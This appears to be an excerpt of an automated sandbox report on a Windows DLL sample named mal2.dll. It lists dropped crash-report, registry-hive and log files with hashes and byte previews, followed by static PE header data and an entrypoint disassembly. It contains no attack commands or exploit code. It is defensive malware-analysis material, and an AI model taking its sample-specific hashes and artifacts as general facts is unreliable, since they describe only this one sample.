                                                                                                                                                                                    Preview: <?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="1279403" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..
                                                                                                                                                                                    C:\ProgramData\Microsoft\Windows\WER\Temp\WERF332.tmp.csv
                                                                                                                                                                                    Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                    File Type:data
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):51434
                                                                                                                                                                                    Entropy (8bit):3.0498289941132173
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:768:WUHXfdwAEFOWUfANWsYXtNxxwFMj9OqjGSZUGPjxYGlcBvWVJnotDCBwDb:WUHXfSZO7fANWsYXBWFMj9T3qtDCAb
                                                                                                                                                                                    MD5:2F9D4E1607FC24DD03F01DD170D2B9A8
                                                                                                                                                                                    SHA1:8FA16BF2E54680E537D5B2C358BA0AB5E9DABD38
                                                                                                                                                                                    SHA-256:FF7114A8B3D440724F271649D8FE49B8301F8D445F9CFB7936FADF062C673287
                                                                                                                                                                                    SHA-512:829D3F76FC38096B9092B14CD2C9F979397ECD8209BD69D9805D0696EAA059E5F9F56033ACB1A9A7C6192A2EAD143506C80597AC0902AE0880EB4F3DDFB58758
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Preview: I.m.a.g.e.N.a.m.e.,.U.n.i.q.u.e.P.r.o.c.e.s.s.I.d.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.,.W.o.r.k.i.n.g.S.e.t.P.r.i.v.a.t.e.S.i.z.e.,.H.a.r.d.F.a.u.l.t.C.o.u.n.t.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.H.i.g.h.W.a.t.e.r.m.a.r.k.,.C.y.c.l.e.T.i.m.e.,.C.r.e.a.t.e.T.i.m.e.,.U.s.e.r.T.i.m.e.,.K.e.r.n.e.l.T.i.m.e.,.B.a.s.e.P.r.i.o.r.i.t.y.,.P.e.a.k.V.i.r.t.u.a.l.S.i.z.e.,.V.i.r.t.u.a.l.S.i.z.e.,.P.a.g.e.F.a.u.l.t.C.o.u.n.t.,.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.P.e.a.k.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.Q.u.o.t.a.P.e.a.k.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.e.a.k.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.e.a.k.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.r.i.v.a.t.e.P.a.g.e.C.o.u.n.t.,.R.e.a.d.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.W.r.i.t.e.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.O.t.h.e.r.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.R.e.a.d.T.r.a.n.s.f.e.r.C.o.u.n.t.,.W.r.i.t.e.T.r.a.n.s.f.e.r.C.o.u.n.t.,.O.t.h.e.r.T.r.a.n.s.f.e.r.C.o.u.n.t.,.H.a.n.
                                                                                                                                                                                    C:\ProgramData\Microsoft\Windows\WER\Temp\WERF8C8.tmp.dmp
                                                                                                                                                                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                    File Type:Mini DuMP crash report, 15 streams, Thu Dec 2 02:13:05 2021, 0x1205a4 type
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):26772
                                                                                                                                                                                    Entropy (8bit):2.493265540866841
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:192:3mdeSFY2OgqSUyW61CV2egzW++Y4/k0b:L3B9S6Sm2egzW++r
                                                                                                                                                                                    MD5:F8961A93E50ED97FFE44916749FCEAC7
                                                                                                                                                                                    SHA1:5689BAE7D2A7DB46F82341446208835091C019BB
                                                                                                                                                                                    SHA-256:8FD8510E9EDCEF00977C874670F4CD0AD95896F557CC90737CDB459A911984FD
                                                                                                                                                                                    SHA-512:E99A5AD4282F3D4F2703634C49AAF9F1496190F3632F1706421A18A622BA330FA0C7CC35C7B724E999437E846BD4ED7ED512C95B6FA86358F8E700C543792054
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Preview: MDMP....... ........+.a............4...............H.......$...........................`.......8...........T...........h...,\...........................................................................................U...........B......p.......GenuineIntelW...........T.......\....+.a4............................0..................P.a.c.i.f.i.c. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................P.a.c.i.f.i.c. .D.a.y.l.i.g.h.t. .T.i.m.e...........................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.........................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                    C:\ProgramData\Microsoft\Windows\WER\Temp\WERF93D.tmp.txt
                                                                                                                                                                                    Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                    File Type:data
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):13340
                                                                                                                                                                                    Entropy (8bit):2.6947576651193192
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:96:9GiZYWL/QMqSbKY2YnWMHqUYEZnTtk0iEoN0WwCPoF3ap0c0uLIsD3:9jZDcVBWiPA3ap0c0uEsD3
                                                                                                                                                                                    MD5:FAA6916AB10486DBDCDA647FD3C22ECC
                                                                                                                                                                                    SHA1:7BC2EA7F84AA1D9C4E8FF1499E0C49E043545734
                                                                                                                                                                                    SHA-256:D1C691161044900D903896BC1FAFF5FA543CD7A0CB0717101434925ED7CB2E80
                                                                                                                                                                                    SHA-512:758624784E4B5183F9F85FE870E87E63EE5855F90DA13AC105E78C9F4DA8AB6D9F527E82F56B1DBA81AFA83CA8B5099D8596995F0238B769F736037D59E0F780
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Preview: B...T.i.m.e.r.R.e.s.o.l.u.t.i.o.n. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .1.5.6.2.5.0.....B...P.a.g.e.S.i.z.e. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .4.0.9.6.....B...N.u.m.b.e.r.O.f.P.h.y.s.i.c.a.l.P.a.g.e.s. . . . . . . . . . . . . . . . . . . . . . . . . . .1.0.4.8.3.1.5.....B...L.o.w.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . . . . . . . . .1.....B...H.i.g.h.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . .1.3.1.0.7.1.9.....B...A.l.l.o.c.a.t.i.o.n.G.r.a.n.u.l.a.r.i.t.y. . . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.i.n.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.a.x.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . .1.4.0.7.3.7.4.8.8.2.8.9.7.9.1.....B...A.c.t.i.v.e.P.r.o.c.e.s.s.o.r.s.A.f.f.i.n.i.t.y.M.a.s.k. . . . . . .
                                                                                                                                                                                    C:\ProgramData\Microsoft\Windows\WER\Temp\WERFBB7.tmp.WERInternalMetadata.xml
                                                                                                                                                                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                    File Type:XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):8340
                                                                                                                                                                                    Entropy (8bit):3.700898754753585
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:192:Rrl7r3GLNilDE6+BE6YgMSUwU6gmf/SzQCpBQ89bX4ybsfOdm:RrlsNii6z6Y7SUwZgmf/Sz3X4ygfV
                                                                                                                                                                                    MD5:D4C611C377032E97C2514E543BB198B4
                                                                                                                                                                                    SHA1:91A8A0CD69F4772E4E8BB7D4084F5CF46EB135BF
                                                                                                                                                                                    SHA-256:7740A1B3FB7690E525C0526C7CAEB3290AF346949FB78E571970FE06BC4544D5
                                                                                                                                                                                    SHA-512:06DFE53E462570190C7B1B8CAAC51DE680682DCD85089F1DE6A0B9B69C6EABEC642DCAA5090061BB1BC35087DED573FDD58787B35D5192E1315CB04BEB842666
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Preview: ..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.0.0.4.<./.P.i.d.>.......
                                                                                                                                                                                    C:\ProgramData\Microsoft\Windows\WER\Temp\WERFFDF.tmp.xml
                                                                                                                                                                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                    File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):4598
                                                                                                                                                                                    Entropy (8bit):4.478070100352306
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:48:cvIwSD8zsSJgtWI9t5WSC8BZ18fm8M4J2y4ZFyM+q84WU4KcQIcQwQWd:uITfgCISN6J+mM74KkwQWd
                                                                                                                                                                                    MD5:901E663F0689D125D6ED87EBC8E7EBEF
                                                                                                                                                                                    SHA1:9EBD1B7A72B205A1F995C0DF47685FF07ECEAE01
                                                                                                                                                                                    SHA-256:0824B40182C7B089DCB66351F0F2D9C1FDE066769E6E7B014409EECF8FA2A36D
                                                                                                                                                                                    SHA-512:1A5C03F35B7196A238F025F239DA841F1A99C7E1B03D71AA753CB18DE61458D02D1487343957C7B15C9846F8859FD1446D810C0495F73E5D219D96A847491006
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Preview: <?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="1279403" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..
                                                                                                                                                                                    C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
                                                                                                                                                                                    Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):55
                                                                                                                                                                                    Entropy (8bit):4.306461250274409
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
                                                                                                                                                                                    MD5:DCA83F08D448911A14C22EBCACC5AD57
                                                                                                                                                                                    SHA1:91270525521B7FE0D986DB19747F47D34B6318AD
                                                                                                                                                                                    SHA-256:2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
                                                                                                                                                                                    SHA-512:96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Preview: {"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}
                                                                                                                                                                                    C:\Windows\ServiceProfiles\LocalService\AppData\Local\Temp\MpCmdRun.log
                                                                                                                                                                                    Process:C:\Program Files\Windows Defender\MpCmdRun.exe
                                                                                                                                                                                    File Type:Little-endian UTF-16 Unicode text, with CRLF, CR line terminators
                                                                                                                                                                                    Category:modified
                                                                                                                                                                                    Size (bytes):9062
                                                                                                                                                                                    Entropy (8bit):3.165793018472961
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:192:cY+38+DJDD+iDtJC+iw3+gF+O5+6tw+EStN+EjF+a:j+s+5D+Me+X+u+M+j+l+e+a
                                                                                                                                                                                    MD5:708EB5390168D51F37F4E458111AE8C0
                                                                                                                                                                                    SHA1:32A1F28C8D08B78FF0AC63D928828BF4579A3FE5
                                                                                                                                                                                    SHA-256:15D587646AB66CD629120DA96B4F2043484269593D358D0CEE8C2894776056F8
                                                                                                                                                                                    SHA-512:E4F9601928D0692D7514B5C078237CB9BB98E1C088A0D679FE2943C19712940B8384AA5B4DE2AF51B9D623E556DFF985804BFA8BE038FE1B8BC66A338EEB4A0C
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Preview: ..........-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.....M.p.C.m.d.R.u.n.:. .C.o.m.m.a.n.d. .L.i.n.e.:. .".C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.W.i.n.d.o.w.s. .D.e.f.e.n.d.e.r.\.m.p.c.m.d.r.u.n...e.x.e.". .-.w.d.e.n.a.b.l.e..... .S.t.a.r.t. .T.i.m.e.:. .. T.h.u. .. J.u.n. .. 2.7. .. 2.0.1.9. .0.1.:.2.9.:.4.9.........M.p.E.n.s.u.r.e.P.r.o.c.e.s.s.M.i.t.i.g.a.t.i.o.n.P.o.l.i.c.y.:. .h.r. .=. .0.x.1.....W.D.E.n.a.b.l.e.....E.R.R.O.R.:. .M.p.W.D.E.n.a.b.l.e.(.T.R.U.E.). .f.a.i.l.e.d. .(.8.0.0.7.0.4.E.C.).....M.p.C.m.d.R.u.n.:. .E.n.d. .T.i.m.e.:. .. T.h.u. .. J.u.n. .. 2.7. .. 2.0.1.9. .0.1.:.2.9.:.4.9.....-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.............-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.
                                                                                                                                                                                    C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\DeliveryOptimization\Logs\dosvc.20211202_021113_237.etl
                                                                                                                                                                                    Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                    File Type:data
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):12288
                                                                                                                                                                                    Entropy (8bit):3.814818745053362
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:96:w2Cc62o+wY5C09+/YNQCeII2lK1kpO4t8T2djFz+NMCcdJReY5noUMCVY5XUMC9P:YcZ7kyW2epuCEoCWCwC/CdCf
                                                                                                                                                                                    MD5:FA329CB7429526B6B8B03ADEEC413C38
                                                                                                                                                                                    SHA1:3FBFA81DF63214471F74855DF2BE06F66B07D83C
                                                                                                                                                                                    SHA-256:50D80E5A9FCF52876BE9AD97E3A1278702058E90838C4C343B8218532FBBBB9B
                                                                                                                                                                                    SHA-512:6686F02FE87875AD8E856EA77FDB573F593F19611043C34E1FBCDC107AA5C0EF47E4DA8B54B4FC4E6790CAEEE08DFE867A42C426E3E085794D827F2579C0C21C
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Preview: .... ... ....................................... ...!....................................H;......................B..............Zb... ... ..........................................@.t.z.r.e.s...d.l.l.,.-.2.1.2.......................................................@.t.z.r.e.s...d.l.l.,.-.2.1.1...........................................................N...=..... .....8Ji.!...........8.6.9.6.E.A.C.4.-.1.2.8.8.-.4.2.8.8.-.A.4.E.E.-.4.9.E.E.4.3.1.B.0.A.D.9...C.:.\.W.i.n.d.o.w.s.\.S.e.r.v.i.c.e.P.r.o.f.i.l.e.s.\.N.e.t.w.o.r.k.S.e.r.v.i.c.e.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.M.i.c.r.o.s.o.f.t.\.W.i.n.d.o.w.s.\.D.e.l.i.v.e.r.y.O.p.t.i.m.i.z.a.t.i.o.n.\.L.o.g.s.\.d.o.s.v.c...2.0.2.1.1.2.0.2._.0.2.1.1.1.3._.2.3.7...e.t.l.........P.P..........H;.....................................................................................................................................................................................................................................................................
                                                                                                                                                                                    C:\Windows\appcompat\Programs\Amcache.hve
                                                                                                                                                                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                    File Type:MS Windows registry file, NT/2000 or above
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):1572864
                                                                                                                                                                                    Entropy (8bit):4.27749972913675
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:12288:kORyRWMWGS6f0u9qtIhIDzeBKBxXq26ZFbTpGwBVNVFxsguvB5:BQRWMWGS6f0u9q5vfx2
                                                                                                                                                                                    MD5:7D64DE8A1535F4B540BB6ED4F7E51FF4
                                                                                                                                                                                    SHA1:2BEDF1022F0A77D4753646BA64F5C4F5D6F689D5
                                                                                                                                                                                    SHA-256:60C7918C794CEDC0432EBAB947B5D2EB7C121013A453FC6D876BC542D9AC3AFC
                                                                                                                                                                                    SHA-512:765CCB571C18EF92C7D70A0A1CEDCC20282AFB2177975E1674819A5BB1DCDF70A11F15CCF06ADD9A69E90F921275B45FD2B466092DAF25F5E3677ACF87ABDDE1
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Preview: regfX...X...p.\..,.................. ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e...4............E.4............E.....5............E.rmtm.):#"................................................................................................................................................................................................................................................................................................................................................M>~........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                    C:\Windows\appcompat\Programs\Amcache.hve.LOG1
                                                                                                                                                                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                    File Type:MS Windows registry file, NT/2000 or above
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):16384
                                                                                                                                                                                    Entropy (8bit):3.5049220808682473
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:192:x2gAyM1ZfZ4oy1Ya5FSE02n5w3naa6iS3KP/KFptQOSkvWsadR:M2z5+nX9SaP/SptQOS6XadR
                                                                                                                                                                                    MD5:35695BB667336783ACB77AEB95BE7D00
                                                                                                                                                                                    SHA1:1A6F38BEF0C27EDB367C857262A0FCFCC9F6B082
                                                                                                                                                                                    SHA-256:B78F86458D4F5F86622245D0C68CC07F81F8B6A8E3286CDE19D2CDD073605BB6
                                                                                                                                                                                    SHA-512:FDB75FD994EE89364D1E8805F5BDD77F146D8DFAD648FC4D3669FD814D07B82D3EEBD69347D19D6BF4C846EA20895EF05B5E88C6763F35491B8128541EAF90EF
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Preview: regfW...W...p.\..,.................. ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e...4............E.4............E.....5............E.rmtm.):#"................................................................................................................................................................................................................................................................................................................................................M>~HvLE.>......W...........U..47.G6....Oi..........0..............hbin................p.\..,..........nk,.9.<#"................................... ...........................&...{ad79c032-a2ea-f756-e377-72fb9332c3ae}......nk .9.<#"....... ...........8~.............. .......Z.......................Root........lf......Root....nk .9.<#".................................. ...............*...............DeviceCensus.......................vk..................WritePermissionsCheck.......p...

                                                                                                                                                                                    Static File Info

                                                                                                                                                                                    General

                                                                                                                                                                                    File type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                    Entropy (8bit):6.970959661903669
                                                                                                                                                                                    TrID:
                                                                                                                                                                                    • Win32 Dynamic Link Library (generic) (1002004/3) 99.60%
                                                                                                                                                                                    • Generic Win/DOS Executable (2004/3) 0.20%
                                                                                                                                                                                    • DOS Executable Generic (2002/1) 0.20%
                                                                                                                                                                                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                                    File name:mal2.dll
                                                                                                                                                                                    File size:387072
                                                                                                                                                                                    MD5:9efbd03d5576686dd9f0678c09abe9fc
                                                                                                                                                                                    SHA1:0b821e78137018bbf3f9c67d3b049e33d5b36ae5
                                                                                                                                                                                    SHA256:972f9350219dcc2df463f923ec5b559f4ab69f083da9ccbd0976c51bc19f3f5b
                                                                                                                                                                                    SHA512:fa2def2a793d79b63cf2c808c62e031544282bc3e01f97efa47b3114c702b004d767b818764f47c120007c680274ad9327587ac235186ee6e6d7bb168a19acc9
                                                                                                                                                                                    SSDEEP:6144:zBYrPMTsY8GR3j4fubnY6Zs/Bv6yM6aSTsfA2qL6jpXNcc6CEteuQJPIgtlpZ5L:yhmT4GbnYks/BJNWo2LjpScDEteuOIoZ
                                                                                                                                                                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........0...Q...Q...Q..E#...Q..E#...Q..E#...Q../$...Q...$...Q...$...Q...$...Q..E#...Q...Q...Q...Q...Q../$...Q../$...Q..Rich.Q.........

                                                                                                                                                                                    File Icon

                                                                                                                                                                                    Icon Hash:74f0e4ecccdce0e4

                                                                                                                                                                                    Static PE Info

                                                                                                                                                                                    General

                                                                                                                                                                                    Entrypoint:0x1001cac1
                                                                                                                                                                                    Entrypoint Section:.text
                                                                                                                                                                                    Digitally signed:false
                                                                                                                                                                                    Imagebase:0x10000000
                                                                                                                                                                                    Subsystem:windows gui
                                                                                                                                                                                    Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE, DLL, LARGE_ADDRESS_AWARE
                                                                                                                                                                                    DLL Characteristics:DYNAMIC_BASE, NX_COMPAT
                                                                                                                                                                                    Time Stamp:0x61A73B52 [Wed Dec 1 09:07:30 2021 UTC]
                                                                                                                                                                                    TLS Callbacks:0x1000c340
                                                                                                                                                                                    CLR (.Net) Version:
                                                                                                                                                                                    OS Version Major:6
                                                                                                                                                                                    OS Version Minor:0
                                                                                                                                                                                    File Version Major:6
                                                                                                                                                                                    File Version Minor:0
                                                                                                                                                                                    Subsystem Version Major:6
                                                                                                                                                                                    Subsystem Version Minor:0
                                                                                                                                                                                    Import Hash:609402ef170a35cc0e660d7d95ac10ce

                                                                                                                                                                                    Entrypoint Preview

                                                                                                                                                                                    Instruction
                                                                                                                                                                                    push ebp
                                                                                                                                                                                    mov ebp, esp
                                                                                                                                                                                    cmp dword ptr [ebp+0Ch], 01h
                                                                                                                                                                                    jne 00007FCBCCAF38F7h
                                                                                                                                                                                    call 00007FCBCCAF3C88h
                                                                                                                                                                                    push dword ptr [ebp+10h]
                                                                                                                                                                                    push dword ptr [ebp+0Ch]
                                                                                                                                                                                    push dword ptr [ebp+08h]
                                                                                                                                                                                    call 00007FCBCCAF37A3h
                                                                                                                                                                                    add esp, 0Ch
                                                                                                                                                                                    pop ebp
                                                                                                                                                                                    retn 000Ch
                                                                                                                                                                                    push ebp
                                                                                                                                                                                    mov ebp, esp
                                                                                                                                                                                    push dword ptr [ebp+08h]
                                                                                                                                                                                    call 00007FCBCCAF419Eh
                                                                                                                                                                                    pop ecx
                                                                                                                                                                                    pop ebp
                                                                                                                                                                                    ret
                                                                                                                                                                                    push ebp
                                                                                                                                                                                    mov ebp, esp
                                                                                                                                                                                    jmp 00007FCBCCAF38FFh
                                                                                                                                                                                    push dword ptr [ebp+08h]
                                                                                                                                                                                    call 00007FCBCCAF7C84h
                                                                                                                                                                                    pop ecx
                                                                                                                                                                                    test eax, eax
                                                                                                                                                                                    je 00007FCBCCAF3901h
                                                                                                                                                                                    push dword ptr [ebp+08h]
                                                                                                                                                                                    call 00007FCBCCAF7D00h
                                                                                                                                                                                    pop ecx
                                                                                                                                                                                    test eax, eax
                                                                                                                                                                                    je 00007FCBCCAF38D8h
                                                                                                                                                                                    pop ebp
                                                                                                                                                                                    ret
                                                                                                                                                                                    cmp dword ptr [ebp+08h], FFFFFFFFh
                                                                                                                                                                                    je 00007FCBCCAF4263h
                                                                                                                                                                                    jmp 00007FCBCCAF4240h
                                                                                                                                                                                    push ebp
                                                                                                                                                                                    mov ebp, esp
                                                                                                                                                                                    push 00000000h
                                                                                                                                                                                    call dword ptr [1002A08Ch]
                                                                                                                                                                                    push dword ptr [ebp+08h]
                                                                                                                                                                                    call dword ptr [1002A088h]
                                                                                                                                                                                    push C0000409h
                                                                                                                                                                                    call dword ptr [1002A040h]
                                                                                                                                                                                    push eax
                                                                                                                                                                                    call dword ptr [1002A090h]
                                                                                                                                                                                    pop ebp
                                                                                                                                                                                    ret
                                                                                                                                                                                    push ebp
                                                                                                                                                                                    mov ebp, esp
                                                                                                                                                                                    sub esp, 00000324h
                                                                                                                                                                                    push 00000017h
                                                                                                                                                                                    call dword ptr [1002A094h]
                                                                                                                                                                                    test eax, eax
                                                                                                                                                                                    je 00007FCBCCAF38F7h
                                                                                                                                                                                    push 00000002h
                                                                                                                                                                                    pop ecx
                                                                                                                                                                                    int 29h
                                                                                                                                                                                    mov dword ptr [1005E278h], eax
                                                                                                                                                                                    mov dword ptr [1005E274h], ecx
                                                                                                                                                                                    mov dword ptr [1005E270h], edx
                                                                                                                                                                                    mov dword ptr [1005E26Ch], ebx
                                                                                                                                                                                    mov dword ptr [1005E268h], esi
                                                                                                                                                                                    mov dword ptr [1005E264h], edi
                                                                                                                                                                                    mov word ptr [eax], es

                                                                                                                                                                                    Data Directories

                                                                                                                                                                                    NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_EXPORT0x5b5900x614.rdata
                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_IMPORT0x5bba40x3c.rdata
                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_RESOURCE0x00x0
                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_BASERELOC0x600000x1bc0.reloc
                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_DEBUG0x5a1dc0x54.rdata
                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
